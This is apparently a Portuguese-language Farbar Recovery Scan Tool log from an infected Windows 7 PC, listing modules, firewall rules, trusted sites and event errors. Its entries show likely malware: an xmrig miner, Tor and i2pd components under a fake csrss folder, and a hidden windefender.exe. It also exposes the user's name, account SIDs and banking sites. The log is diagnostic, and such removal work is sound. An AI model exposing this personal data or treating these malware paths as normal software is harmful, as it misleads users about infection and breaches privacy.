ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% --disable-quic
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%

==================== Módulos Carregados (Whitelisted) ==============

2015-12-26 12:09 - 2011-04-13 23:41 - 000034304 _____ () C:\Windows\System32\ssb3ml6.dll
2015-12-18 12:43 - 2015-03-11 23:43 - 000022528 _____ () C:\Windows\System32\ux003lm.dll
2018-06-05 05:50 - 2018-06-05 05:50 - 001864224 _____ () C:\Program Files\5850f7899b7a00e77740675180ff5f97\eafeb516191690959119ed8371b79fca.exe
2018-06-05 22:11 - 2018-06-05 21:39 - 003780096 _____ () C:\ProgramData\Logic Cramble\set.exe
2018-06-05 22:06 - 2018-06-06 02:37 - 000043520 _____ () C:\ProgramData\PrefsSecure\Nettrans.exe
2013-10-17 14:27 - 2013-10-17 14:27 - 000166912 _____ () C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe
2015-12-18 12:43 - 2015-12-18 12:43 - 000143664 ____N () C:\Windows\SysWOW64\SecUPDUtilSvc.exe
2016-10-25 08:57 - 2016-10-25 08:57 - 000491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
2018-06-05 22:11 - 2018-03-24 14:51 - 002990080 _____ () C:\Windows\system32\mcicda64.dll
2017-03-31 01:01 - 2017-03-31 01:01 - 001049744 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.5000183\WeatherEntryDll.dll
2018-06-05 22:08 - 2018-06-05 22:08 - 003630080 _____ () C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\tor.exe
2018-06-05 22:08 - 2018-06-05 22:08 - 001593344 _____ () C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\obfs4proxy.exe
2017-03-31 01:01 - 2017-03-31 01:01 - 000149136 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.5000183\WeatherService.exe
2018-06-05 22:08 - 2018-06-05 22:08 - 001435136 ____H () C:\Windows\windefender.exe
2018-06-05 22:12 - 2018-06-06 07:48 - 002064847 _____ () C:\Users\Alessandra\AppData\Local\Temp\xmrig.exe
2015-12-18 09:55 - 2012-12-20 03:18 - 000094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2018-06-06 07:48 - 2018-06-06 07:48 - 000871424 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-5TP8H.tmp\5rdiqyozohf.tmp
2018-06-06 07:48 - 2018-06-06 07:48 - 000709632 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-S3C6D.tmp\gje1ddkrsb3.tmp
2018-06-06 07:49 - 2018-06-06 07:49 - 000709632 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-F31S8.tmp\4w2suwq3kyp.tmp
2018-06-06 07:49 - 2018-06-06 07:49 - 000709632 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-QTJFQ.tmp\ydak1uysdro.tmp
2018-06-06 07:49 - 2018-06-06 07:49 - 000709632 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-U3PGO.tmp\5dpz20uzgsy.tmp
2018-06-06 07:49 - 2018-06-06 07:49 - 000709632 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-RPQ8E.tmp\imjsul3e1mv.tmp
2015-12-26 12:11 - 2010-10-28 07:14 - 000618496 _____ () C:\Windows\Samsung\PanelMgr\SSMMgr.exe
2018-06-06 07:49 - 2018-06-06 07:49 - 000709632 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-4PDJ2.tmp\1h11oowtwfi.tmp
2018-06-06 07:49 - 2018-06-06 07:49 - 000709632 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-4PDJ1.tmp\30pkxk0pivi.tmp
2015-12-26 12:11 - 2009-11-19 06:15 - 000306688 _____ () C:\Windows\Samsung\PanelMgr\caller64.exe
2018-06-05 22:08 - 2018-06-05 22:08 - 000342528 _____ () C:\ProgramData\Kipolam\Fasehold.dll
2018-05-17 19:48 - 2018-05-15 00:13 - 004443992 _____ () C:\Program Files (x86)\Google\Chrome\Application\66.0.3359.181\libglesv2.dll
2018-05-17 19:48 - 2018-05-15 00:13 - 000099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\66.0.3359.181\libegl.dll
2018-06-05 22:09 - 2018-06-05 22:09 - 000959488 _____ () C:\Windows\zmtcxviskgfclpcu.zztcx
2017-09-20 18:56 - 2017-06-15 11:16 - 000061944 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\QtSolutions_Service-head.dll
2017-09-20 18:56 - 2017-06-15 11:15 - 000110584 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qjson0.dll
2018-06-05 22:08 - 2018-06-05 22:08 - 000107520 _____ () C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\zlib1.dll
2018-06-05 22:08 - 2018-06-05 22:08 - 000093095 _____ () C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\libssp-0.dll
2018-06-05 22:08 - 2018-06-05 22:08 - 000717225 _____ () C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\libevent-2-0-5.dll
2018-06-05 22:08 - 2018-06-05 22:08 - 000523022 _____ () C:\Users\Alessandra\AppData\Local\Temp\csrss\proxy\libgcc_s_sjlj-1.dll
2017-03-31 01:01 - 2017-03-31 01:01 - 000575120 _____ () C:\Program Files (x86)\WeatherTool\2.0.1.5000183\Updata.dll
2018-06-06 07:48 - 2018-06-06 07:48 - 000024240 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-2OANT.tmp\_isetup\_isdecmp.dll
2018-06-06 07:48 - 2008-10-15 17:44 - 000205312 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-2OANT.tmp\itdownload.dll
2018-06-06 07:49 - 2018-06-06 07:49 - 000024240 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-VLU7I.tmp\_isetup\_isdecmp.dll
2018-06-06 07:49 - 2008-10-15 17:44 - 000205312 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-VLU7I.tmp\itdownload.dll
2018-06-06 07:49 - 2018-06-06 07:49 - 000024240 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-GCOT9.tmp\_isetup\_isdecmp.dll
2018-06-06 07:49 - 2008-10-15 17:44 - 000205312 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-GCOT9.tmp\itdownload.dll
2018-06-06 07:49 - 2018-06-06 07:49 - 000024240 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-E36CS.tmp\_isetup\_isdecmp.dll
2018-06-06 07:49 - 2008-10-15 17:44 - 000205312 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-E36CS.tmp\itdownload.dll
2018-06-06 07:49 - 2018-06-06 07:49 - 000024240 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-RC80F.tmp\_isetup\_isdecmp.dll
2018-06-06 07:49 - 2008-10-15 17:44 - 000205312 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-RC80F.tmp\itdownload.dll
2018-06-06 07:49 - 2018-06-06 07:49 - 000024240 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-I24E7.tmp\_isetup\_isdecmp.dll
2018-06-06 07:49 - 2008-10-15 17:44 - 000205312 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-I24E7.tmp\itdownload.dll
2018-06-06 07:49 - 2018-06-06 07:49 - 000024240 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-KQBF9.tmp\_isetup\_isdecmp.dll
2018-06-06 07:49 - 2008-10-15 17:44 - 000205312 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-KQBF9.tmp\itdownload.dll
2018-06-06 07:49 - 2018-06-06 07:49 - 000024240 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-3D82V.tmp\_isetup\_isdecmp.dll
2018-06-06 07:49 - 2008-10-15 17:44 - 000205312 _____ () C:\Users\Alessandra\AppData\Local\Temp\is-3D82V.tmp\itdownload.dll
2017-09-20 18:56 - 2017-04-04 16:11 - 000052224 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qoauth_Ad_1.dll
2017-09-20 18:56 - 2017-04-04 16:11 - 000742400 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qca_Ad_2.dll
2017-09-20 18:56 - 2017-04-04 16:11 - 000195584 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\qjson_Ad_0.dll
2017-09-20 18:56 - 2017-04-04 16:11 - 000043912 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\QtSolutions_MFCMigrationFramework_Ad_2.dll
2017-09-20 18:56 - 2017-06-15 10:49 - 000279976 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\pt-BR\AdWingManRes.dll
2017-09-20 18:56 - 2017-02-14 03:39 - 040640808 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\libcef.dll
2017-09-20 18:56 - 2017-02-14 03:39 - 000912384 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\libglesv2.dll
2017-09-20 18:56 - 2017-02-14 03:39 - 000134144 _____ () C:\Program Files (x86)\Autodesk\Autodesk Desktop App\acwebbrowser\libegl.dll

==================== Alternate Data Streams (Whitelisted) =========

(Se uma entrada for incluída na fixlist, somente o ADS será removido.)

AlternateDataStreams: C:\Windows\system32\Drivers\wsddfac.sys:X5ZN8aGXs4 [2410]

==================== Modo de Segurança (Whitelisted) ===================

(Se uma entrada for incluída na fixlist, será removida do Registro. O valor "AlternateShell" será restaurado.)


==================== Associação (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, o ítem no Registro será restaurado para o padrão ou removido.)

HKU\S-1-5-21-1322778411-14668823-402750941-1000\Software\Classes\.scr: AutoCADScriptFile => C:\Windows\system32\notepad.exe "%1"

==================== Internet Explorer confiável/restrito ===============

(Se uma entrada for incluída na fixlist, será removida do Registro.)

IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\.DEFAULT\...\webcompanion.com -> hxxp://webcompanion.com
IE trusted site: HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\bancobrasil.com.br -> www.bancobrasil.com.br
IE trusted site: HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\bb.com.br -> aapj.bb.com.br
IE trusted site: HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\caixa.gov.br -> hxxps://imagem.caixa.gov.br
IE trusted site: HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\caixa.gov.br -> imagem.caixa.gov.br
IE trusted site: HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\gastecnologia.com.br -> cloud.gastecnologia.com.br
IE trusted site: HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1322778411-14668823-402750941-1000\...\webcompanion.com -> hxxp://webcompanion.com

==================== Hosts Conteúdo: ==========================

(Se necessário, a diretiva Hosts: pode ser incluída na fixlist para redefinir o Hosts.)

2009-07-13 23:34 - 2018-06-05 22:08 - 000001320 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Outras Áreas ============================

(Atualmente não há nenhuma correção automática para esta seção.)

HKU\S-1-5-21-1322778411-14668823-402750941-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Alessandra\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.15.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Firewall do Windows está habilitado.

==================== MSCONFIG/TASK MANAGER ítens desabilitados ==


==================== Regras do Firewall (Whitelisted) ===============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{BEA90970-D349-46E4-B0E0-80C5BA491732}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{9E7F4A82-79AD-46EB-8C71-D53A42139996}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{BE2BCE29-0A2F-4FC9-947C-A17068EAB249}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{15617914-BFB2-400C-BB50-EA1B27792B99}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{31A06FF5-2487-4820-8C1D-C659D5005BED}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{9CDE5665-1246-4FD6-B557-A66A1DB5A553}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{3685251F-53FB-4795-94F3-198079939570}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{F6B8CCAA-737F-4FE7-A32D-AFF6BD0F881E}] => (Allow) C:\Program Files (x86)\Samsung\Samsung Printer Center\SamsungPrinterCenter.exe
FirewallRules: [{C4D91B7B-2B8A-4D71-9E57-D4689C538FD3}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{DF992E6B-904E-42CD-93EF-AD87A517FF1A}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
FirewallRules: [{379FD7F8-9CAA-4D9C-AE1C-C2620CE7AFBA}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{9E0B90D5-9FA8-4743-B8DB-3C4F4D20C081}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
FirewallRules: [{25EE7BDB-1D16-4CE2-8358-51D7EFBFC812}] => (Allow) C:\Program Files\Diebold\Warsaw\core.exe
FirewallRules: [{5034E993-8E90-4E96-B04A-D470477C4CE1}] => (Allow) C:\Windows\twain_32\Samsung\ScanMgr.exe
FirewallRules: [{1EC792B7-D9ED-4AA1-B707-28E23C7298AD}] => (Allow) C:\Windows\twain_32\Samsung\ScanMgr.exe
FirewallRules: [{7AB07B33-D881-4460-AE4C-3437D87898C7}] => (Allow) C:\Windows\twain_32\Samsung\SCX3200\Scan2Pc.exe
FirewallRules: [{ABA0D127-C410-4FA4-BB17-3E117A0375F0}] => (Allow) C:\Windows\twain_32\Samsung\SCX3200\Scan2Pc.exe
FirewallRules: [{0989E54B-C060-4C5E-B203-57E269737FA8}] => (Allow) C:\Windows\twain_32\Samsung\SCX3200\Sscan2io.exe
FirewallRules: [{3C207214-DE19-450B-AEBA-CA7551BDFF04}] => (Allow) C:\Windows\twain_32\Samsung\SCX3200\Sscan2io.exe
FirewallRules: [{86A0F1FB-7050-476A-93BC-084BF3770D0E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{D03C25FD-B640-47F4-B6FB-5B85B7E58A35}] => (Allow) C:\Program Files\HP\HP Deskjet 2050 J510 series\Bin\USBSetup.exe
FirewallRules: [{C8B8F4AC-3B49-435B-B5BE-AB1545C2B07C}] => (Allow) C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe
FirewallRules: [{D63C6F03-B240-4318-935F-E433031861D4}] => (Allow) C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe
FirewallRules: [{669BC417-C847-499B-A3E7-78043E2287EE}] => (Allow) C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe
FirewallRules: [{037F6CEC-27A4-4CDB-939F-18C6B892D5B7}] => (Allow) C:\Program Files (x86)\RelevantKnowledge\rlvknlg.exe
FirewallRules: [{7055916F-01B7-4ACC-A69D-2E03FED72955}] => (Allow) C:\Users\Alessandra\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{765CB3C3-711E-45B3-A5DD-BA59A59DDC74}] => (Allow) C:\Users\Alessandra\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [TCP Query User{D664A33A-F137-4FED-91D7-79FED50B8F93}C:\program files\java\jre1.8.0_121\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_121\bin\javaw.exe
FirewallRules: [UDP Query User{5F9469E6-819B-4FB4-B793-AEE21A90FE25}C:\program files\java\jre1.8.0_121\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_121\bin\javaw.exe
FirewallRules: [{3A459DCF-102F-4443-9DF8-0F494CD87E36}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{C48752F6-3B67-4EC4-82C0-C64CDB16C115}C:\program files (x86)\java\jre1.8.0_77\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_77\bin\jp2launcher.exe
FirewallRules: [UDP Query User{57C9A482-2A59-4AC8-95AB-2FBB18F87BA9}C:\program files (x86)\java\jre1.8.0_77\bin\jp2launcher.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_77\bin\jp2launcher.exe
FirewallRules: [{F2F7FD9A-2235-4197-A5FB-43C8C685C8C8}] => (Allow) C:\Program Files (x86)\IP-TV Player\IpTvPlayer.exe
FirewallRules: [{042996BC-2C88-4A09-B354-08C222139D1E}] => (Allow) C:\Program Files (x86)\IP-TV Player\IpTvPlayer.exe
FirewallRules: [TCP Query User{70984B4D-22BA-47CD-82E1-7A8D1231DECC}C:\program files\unity\editor\unity.exe] => (Block) C:\program files\unity\editor\unity.exe
FirewallRules: [UDP Query User{53E6EC90-CE6E-48EB-A503-0D03AB279D09}C:\program files\unity\editor\unity.exe] => (Block) C:\program files\unity\editor\unity.exe
FirewallRules: [{BD032716-E073-4BAB-99BF-599AF925A0A6}] => (Allow) C:\Program Files (x86)\PremierOpinion\pmropn.exe
FirewallRules: [{D8BE75C5-CFCC-4534-BE7A-2EAC7C7ECD73}] => (Allow) C:\Program Files (x86)\PremierOpinion\pmropn.exe
FirewallRules: [TCP Query User{46CD3E46-E364-423C-A29D-372398906927}C:\program files\unity\monodevelop\bin\monodevelop.exe] => (Allow) C:\program files\unity\monodevelop\bin\monodevelop.exe
FirewallRules: [UDP Query User{AA057BEF-0370-46BF-BE45-750AEBA2421C}C:\program files\unity\monodevelop\bin\monodevelop.exe] => (Allow) C:\program files\unity\monodevelop\bin\monodevelop.exe
FirewallRules: [TCP Query User{BA785D5C-6ECD-424B-A6A8-DB94A8B15EDA}C:\users\alessandra\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\alessandra\appdata\local\akamai\netsession_win.exe
FirewallRules: [UDP Query User{D6F19BFF-D35F-4C95-A62B-5BF33F3D8DA5}C:\users\alessandra\appdata\local\akamai\netsession_win.exe] => (Allow) C:\users\alessandra\appdata\local\akamai\netsession_win.exe
FirewallRules: [TCP Query User{EE8DFAA1-4DEB-43D1-B72B-AD8997D2E49C}C:\program files (x86)\pje-office-build\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\pje-office-build\jre\bin\javaw.exe
FirewallRules: [UDP Query User{7327BF0E-4608-46FF-954A-C260E1FFCF74}C:\program files (x86)\pje-office-build\jre\bin\javaw.exe] => (Allow) C:\program files (x86)\pje-office-build\jre\bin\javaw.exe
FirewallRules: [{422C4623-2D76-4569-BA23-1610B9334AE8}] => (Block) C:\program files (x86)\pje-office-build\jre\bin\javaw.exe
FirewallRules: [{8A15D626-8B07-4F0E-A23D-1BF21A28AC30}] => (Block) C:\program files (x86)\pje-office-build\jre\bin\javaw.exe
FirewallRules: [{87C783D2-7125-499A-B55D-D85401EA9EB2}] => (Block) %ProgramFiles%\Adobe\Adobe Photoshop Lightroom 5.6\lightroom.exe
FirewallRules: [{F306A095-CD15-4CB8-BFDA-BBFCAD041302}] => (Block) %ProgramFiles%\Adobe\Adobe Photoshop Lightroom 5.6\lightroom.exe
FirewallRules: [{6AF840B7-39B2-4944-BF6D-8CF164876470}] => (Block) %USERPROFILE%\Desktop\PhotoshopPortable\PhotoshopCS6Portable.exe
FirewallRules: [{4B5D398A-114E-4354-9DAF-8596A655080B}] => (Block) %USERPROFILE%\Desktop\PhotoshopPortable\PhotoshopCS6Portable.exe
FirewallRules: [TCP Query User{C43BE371-91F9-4AA7-8268-D51BED0B69D5}C:\program files\java\jre1.8.0_171\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_171\bin\javaw.exe
FirewallRules: [UDP Query User{590B7CBA-168E-463E-A553-B1C39C7B3EF2}C:\program files\java\jre1.8.0_171\bin\javaw.exe] => (Allow) C:\program files\java\jre1.8.0_171\bin\javaw.exe
FirewallRules: [{A5206489-E395-456F-B5CD-CACB927F1895}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{364A1AF3-E0CC-4F6B-97C6-2DE3BFFF5426}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{5442A011-126C-4DC3-A208-F44D0A42E2D5}] => (Allow) C:\Users\Alessandra\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{D405D8AA-56DD-4758-8756-00AFBBC3A2F6}] => (Allow) C:\Users\Alessandra\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{ADB0C9D7-8F89-44F5-B024-3D80E860CF1C}] => (Allow) C:\Users\Alessandra\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{E9A0873A-D4B6-4890-B992-8E7EDC2C9641}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{AFF38F89-AD1A-400C-8535-690144DAEF29}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A58B4EA9-14E7-4349-A6F2-D4D3181B314E}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{04C0119F-801B-4E2B-8362-F8ED8C09E16F}] => (Allow) C:\Users\Alessandra\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{5741E46A-26F0-4F04-BE63-58ED5B6A92A5}] => (Allow) C:\Users\Alessandra\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{95E3CB2F-08D6-42C3-B34A-77EE0BDE2A79}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{A002F838-55F4-495C-96D6-2D9A9963F603}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{8DDD29D9-CF94-4CD4-B9E5-398C2E9E9AE6}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{FB56CA1B-F12F-4469-946B-863842A847FB}] => (Allow) C:\Windows\rss\csrss.exe
FirewallRules: [{23969F5F-F6CC-4040-A753-44FCCF800178}] => (Block) %USERPROFILE%\Desktop\PhotoshopPortable\PhotoshopCS6Portable.exe
FirewallRules: [{3352C429-10E4-4E3A-AB2C-86F38EAB1212}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6B8C9379-2395-46D0-8383-3611268F0B24}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7B7091AC-1909-4C9D-BE3E-CCD19D34DE65}] => (Allow) C:\Program Files\Diebold\Warsaw\core.exe
FirewallRules: [{6EA3883A-4D47-46A4-8BD8-F2F2E99F72D2}] => (Allow) C:\Users\Alessandra\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{BD6AFB05-D4C7-4995-8E08-54097CD9228B}] => (Allow) C:\Users\Alessandra\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{EC93336D-700E-4214-8B17-63F362A8DD7F}] => (Allow) C:\Program Files (x86)\PremierOpinion\pmropn.exe
FirewallRules: [{B562EAB9-5616-4486-AB91-161A823B917F}] => (Allow) C:\Program Files (x86)\PremierOpinion\pmropn.exe

==================== Pontos de Restauração =========================

03-04-2018 06:25:38 Removed Adobe Photoshop Lightroom 5.6 64-bit.
27-04-2018 10:11:15 Windows Update

==================== Dispositivos Apresentando Falhas No Gerenciador =============

Name: Warsaw - Driver (PP)
Description: Warsaw - Driver (PP)
Class Guid: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Manufacturer:
Service: wsddpp
Problem: : This device is not present, is not working properly, or does not have all its drivers installed. (Code 24)
Resolution: The device is installed incorrectly. The problem could be a hardware failure, or a new driver might be needed.
Devices stay in this state if they have been prepared for removal.
After you remove the device, this error disappears.Remove the device, and this error should be resolved.


==================== Erros no Log de eventos: =========================

Erros em Aplicativos:
==================
Error: (06/06/2018 08:00:54 AM) (Source: Customer Experience Improvement Program) (EventID: 1006) (User: )
Description: Um problema impediu que os dados do Programa de Aperfeiçoamento da Experiência do Usuário fossem consolidados em arquivos que podem ser enviados para a Microsoft, (Erro 80004005).

Error: (06/06/2018 07:53:36 AM) (Source: Office 2013 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

Error: (06/06/2018 07:49:44 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: CompMgmtLauncher.exe, versão: 6.1.7600.16385, carimbo de hora: 0x4a5bc7d7
Nome do módulo de falhas: ntdll.dll, versão: 6.1.7601.17514, carimbo de hora: 0x4ce7c8f9
Código de exceção: 0xc000000d
Deslocamento com falha: 0x000000000007a291
Identificação do processo com falha: 0x2c8
Hora de início do aplicativo com falha: 0x01d3fd840284e0a8
Caminho do aplicativo com falha: C:\Windows\system32\CompMgmtLauncher.exe
FCaminho do módulo de falhas: C:\Windows\SYSTEM32\ntdll.dll
Identificação do Relatório: 5244e966-6977-11e8-adf6-50b7c3c6601c

Error: (06/06/2018 07:46:23 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: desktop66.exe, versão: 1.0.0.11, carimbo de hora: 0x5b029b0f
Nome do módulo de falhas: desktop66.exe, versão: 1.0.0.11, carimbo de hora: 0x5b029b0f
Código de exceção: 0x40000015
Deslocamento com falha: 0x0001579c
Identificação do processo com falha: 0xa94
Hora de início do aplicativo com falha: 0x01d3fd834b73ca52
Caminho do aplicativo com falha: C:\ProgramData\yahoochrome_D\desktop66.exe
FCaminho do módulo de falhas: C:\ProgramData\yahoochrome_D\desktop66.exe
Identificação do Relatório: da5ae4b3-6976-11e8-adf6-50b7c3c6601c

Error: (06/06/2018 07:44:31 AM) (Source: Application Error) (EventID: 1005) (User: )
Description: O Windows não pode acessar o arquivo por um destes motivos: há um problema de conexão com a rede, o disco no qual o arquivo está armazenado ou nos drivers de armazenamento
instalados neste computador, ou o disco está ausente. O Windows fechou o programa C++ I2P daemon por causa desse erro.

Programa: C++ I2P daemon
Arquivo:

O valor do erro está listado na seção Dados Adicionais.
Ação do Usuário
1. Abra o arquivo novamente.
Esta situação pode ser um problema temporário corrigida quando o programa é executado novamente.
2.
Se o arquivo ainda não puder ser acessado e
- não estiver na rede,
o administrador da rede deverá verificar se não há um problema com a rede e se o servidor puder ser contatado.
- Está em um disco removível, por exemplo, um disquete ou CD-ROM, verifique se o disco está completamente inserido no computador.
3. Verifique e repare o sistema de arquivos ao executar CHKDSK. Para executar CHKDSK, clique em Iniciar, clique em Executar, digite CMD e clique em OK. No prompt de comando, digite CHKDSK /F e pressione ENTER.
4. Se o problema persistir, restaure o arquivo de uma cópia de backup.
5. Determine se outros arquivos no mesmo disco podem ser abertos. Em caso negativo, o disco pode estar danificado. Se for um disco rígido, contate o administrador ou o fornecedor de hardware do computador para
obter assistência adicional.

Dados Adicionais
Valor do erro: 00000000
Tipo de disco: 0

Error: (06/06/2018 07:44:31 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: i2pd.exe, versão: 2.18.0.0, carimbo de hora: 0x5a70a377
Nome do módulo de falhas: i2pd.exe, versão: 2.18.0.0, carimbo de hora: 0x5a70a377
Código de exceção: 0xc000001d
Deslocamento com falha: 0x0002b47a
Identificação do processo com falha: 0x8c0
Hora de início do aplicativo com falha: 0x01d3fd8347091caf
Caminho do aplicativo com falha: C:\Users\Alessandra\AppData\Local\Temp\csrss\i2pd\i2pd.exe
FCaminho do módulo de falhas: C:\Users\Alessandra\AppData\Local\Temp\csrss\i2pd\i2pd.exe
Identificação do Relatório: 97c0638a-6976-11e8-adf6-50b7c3c6601c

Error: (06/05/2018 10:55:25 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: Explorer.EXE, versão: 6.1.7601.17514, carimbo de hora: 0x4ce7a144
Nome do módulo de falhas: mso.dll_unloaded, versão: 0.0.0.0, carimbo de hora: 0x5641bec7
Código de exceção: 0xc0000005
Deslocamento com falha: 0x000007fef00aeb5c
Identificação do processo com falha: 0x45c
Hora de início do aplicativo com falha: 0x01d3fd38d16653d3
Caminho do aplicativo com falha: C:\Windows\Explorer.EXE
FCaminho do módulo de falhas: mso.dll
Identificação do Relatório: adb673d6-692c-11e8-8381-af52363bd2c4

Error: (06/05/2018 10:40:32 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nome de aplicativo com falha: SWMAgent.exe, versão: 2.2.1.16, carimbo de hora: 0x559bc5e1
Nome do módulo de falhas: unknown, versão: 0.0.0.0, carimbo de hora: 0x00000000
Código de exceção: 0xc0000005
Deslocamento com falha: 0x00000000
Identificação do processo com falha: 0xc84
Hora de início do aplicativo com falha: 0x01d3fd34b62a70bb
Caminho do aplicativo com falha: C:\ProgramData\Samsung\SW Update Service\SWMAgent.exe
FCaminho do módulo de falhas: unknown
